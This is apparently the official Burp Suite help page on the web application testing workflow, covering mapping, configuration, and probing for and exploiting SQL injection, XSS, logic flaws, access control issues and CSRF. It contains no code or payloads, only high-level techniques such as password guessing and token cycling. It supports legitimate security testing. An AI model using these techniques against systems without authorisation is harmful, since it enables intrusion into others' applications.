Using Burp Suite
The sections below describe the essentials of how to use Burp Suite
within your web application testing. For much more information about
general techniques and methodologies for web application testing, please refer to
The Web Application Hacker's Handbook,
which was co-authored by the creator of Burp Suite.
Note: Before starting to use Burp, you first need to get
Burp running, configure display settings, configure your browser and Burp to
work together, and ideally install Burp's SSL CA certificate in your
browser. If you need help with any of these areas, please see the help on
Getting started with Burp Suite.
Testing Workflow
Burp is designed to support the activities of a hands-on web application
tester. It lets you combine manual and automated techniques effectively,
gives you complete control over all of the actions that Burp performs, and
provides detailed information and analysis about the applications you are
testing.
Some users may not wish to use Burp in this way, and only want to perform
a quick and easy vulnerability scan of their application. If this is what
you need, please refer to Using Burp as
a Point-and-Click Scanner.
The diagram below is a high-level overview of the key parts of Burp's
user-driven workflow. Click on each area of the diagram for more detail:
Recon and Analysis
The Proxy tool lies at the heart of Burp's
workflow. It lets you use your browser to navigate the application, while
Burp captures all relevant information and lets you easily initiate further
actions. In a typical test, the recon and analysis phase involves the
following tasks:
- Manually map the application - Using your browser
working through Burp Proxy,
manually map the application
by following links, submitting forms, and stepping through multi-step
processes. This process will populate the
Proxy history and Target site map with all of the
content requested, and (via
passive spidering) will add to
the site map any further
content that can be inferred from application responses (via links,
forms, etc.). You should then
review any unrequested
items (shown in gray in the site map), and request these using your
browser.
- Perform automated mapping where necessary - You can
optionally use Burp to automate the mapping process in various ways. You
can:
- Carry out automatic spidering to
request unrequested items in the site map. Be sure to review all the
Spider settings before
using this tool.
- Use the content
discovery function to find further content that is not linked
from visible content that you can browse to or spider.
- Perform custom
discovery using Burp Intruder, to cycle through lists of common
files and directories, and identify hits.
Note that
before performing any automated actions, it may be necessary to update
various aspects of Burp's configuration, such as
target scope and
session handling.
- Analyze the application's attack surface - The
process of mapping the application populates the Proxy
history and Target
site map with all the information that
Burp has captured about the application. Both of these repositories
contain features to help you
analyze the information
they contain, and assess the attack surface that the application
exposes. Further, you can use Burp's
Target Analyzer to
report the extent of the attack surface and the different types of URLs
the application uses.
Tool Configuration
Burp contains a wealth of configuration options,
which it is often necessary to use at different stages of your testing, to
ensure that Burp works with your target application in the way you require.
For example:
- Display - You can configure the
font and
character set used to
display HTTP messages, and also the
font in Burp's own UI.
- Target scope - The
target scope configuration tells Burp the items that you are
currently interested in and willing to attack. You should configure this
early in your testing, as it can control which items are displayed in the Proxy
history and Target
site map, which messages are
intercepted in the Proxy,
and which items may be spidered
and scanned.
- Authentication - If the application server employs
any platform level (HTTP) authentication, you configure Burp to handle
the authentication
automatically.
- Session handling - Many applications contain
features that can hinder automated or manual testing, such as reactive
session termination, use of per-request tokens, and stateful multi-stage
processes. You can configure Burp to
handle most of these situations seamlessly, using a combination of
session handling rules
and macros.
- Saving and restoring state - You can
save Burp's current
state at any time, and
restore it
later.
- Task scheduling - You can configure Burp to
schedule tasks at given
times or intervals, to allow you to work within specified testing
windows.
Vulnerability Detection and Exploitation
After completing your recon and analysis of the
target application, and any necessary configuration of
Burp, you can begin probing the application for common vulnerabilities. At
the stage, it is often most effective to use several Burp tools at once,
passing individual requests between different tools to perform
different tasks, and also going back to your browser for some tests.
Throughout Burp, you can use the
context menu to pass
items between tools and carry out other actions.
In Burp's default configuration, it automatically performs
live passive scanning
of all requests and responses that pass through the Proxy. So before you
begin actively probing the application, you might find that Burp Scanner has
already recorded some
issues that
warrant closer investigation.
Burp's tools can be used in numerous different ways to support the
process of actively testing for vulnerabilities. Some examples are described
below for different types of issues:
- Input-based bugs - For issues like SQL injection,
cross-site scripting, and file path traversal, you can use Burp in
various ways:
- You can perform active
scans using Burp Scanner. You can select items anywhere in Burp,
and initiate scans
using the context menu. Or you can configure Burp to do
live active
scanning of all in-scope requests passing through the Proxy.
- You can use Burp Intruder to perform
fuzzing, using your
own test strings and payload positions.
- You can send individual requests to
Burp Repeater, to manually modify
and reissue the request over and over.
- Having identified some types of bugs, you can actively exploit
these using Burp Intruder. For example, you can often use the
recursive grep
payload type to exploit SQL injection vulnerabilities.
- Logic and design flaws - For issues like unsafe use
of client-side controls, failure to enforce account lockout, and the
ability to skip key steps in multi-stage processes, you generally need
to work manually:
- Typically, a close review of the
Proxy history will identify
the relevant requests that need to be investigated.
- You can then probe the application's handling of unexpected
requests by issuing these individually using
Burp Repeater, or by turning on
Proxy interception and
manually changing requests on the fly while using your browser.
- You can actively exploit many logic and design flaws using
Burp
Intruder. For example, Intruder can be used to enumerate valid usernames, guess
passwords, cycle through predictable session tokens or password
recovery tokens, or even simply to reissue the same request a large
number of times (using the
null payloads
type).
- Having confirmed a logic or design flaw, many of these can be
actively exploited by using Burp Proxy's
match/replace function,
or session handling
rules, to change requests in systematic ways.
- Access control issues - Burp contains several
features that can help when testing for access control vulnerabilities:
- You can use the
Compare site maps function for various tasks, including:
identifying functionality that is visible to one user and not
another; testing whether a low privileged user can access functions
that should be restricted to higher privileged users; and
discovering where user-specific identifiers are being used to
segregate access to data by two users of the same type.
- You can use different browsers to access the application in
different user contexts, and use a separate
Burp Proxy listener for
each browser (using different ports). You can then open additional
Proxy history windows (via the
context menu) and set the
display filter on each window to show only items received on a
specific listener port. As you use the application in each browser,
each history window will show only the items for the associated user
context. You can then use the "Request in browser in current browser
session" function (via the context menu) to switch requests between
browsers, to determine how they are handled in that browser's user
context.
- Many privilege escalation vulnerabilities arise when the
application passes a user identifier in a request parameter, and uses
that to identify the current user context. You can actively exploit
this type of vulnerability by using
Burp Intruder to cycle through identifiers in the appropriate
format (e.g. using the
numbers or
custom
iterator payload types) and configuring
extract grep items
to retrieve interesting user-specific data from the application's
responses.
- Other vulnerabilities - Burp contains functions
that can be used to deliver, and often automate, virtually any task that
arises when probing for other types of vulnerabilities. For example:
- You can review the contents of the Target
site map for information leakage
issues, using the
Search and Find
comments functions to assist you.
- Having identified a possible CSRF vulnerability, you can use the
CSRF generator to quickly
create a proof-of-concept attack in HTML, then use the "Test in
browser" function to load the attack into your browser, and then
review the browser results and
Proxy history to verify whether the attack was successful.
- You can use Burp Sequencer to
analyze a sample of session tokens from the application, and
estimate the quality of their randomness.
- For some types of encrypted session tokens or other parameters,
you can use the
bit flipper and
ECB block
shuffler payload types in Burp Intruder to blindly modify the
encrypted data in an attempt to meaningfully change the decrypted
data that the application processes.
- You can write your own custom Burp
extensions to carry out more specialized or customized tasks.
Read More
There is extensive documentation for all of Burp's tools and
features, and the typical workflow you need to use when testing with
Burp.
Use the links below for help about using each of the main Burp tools: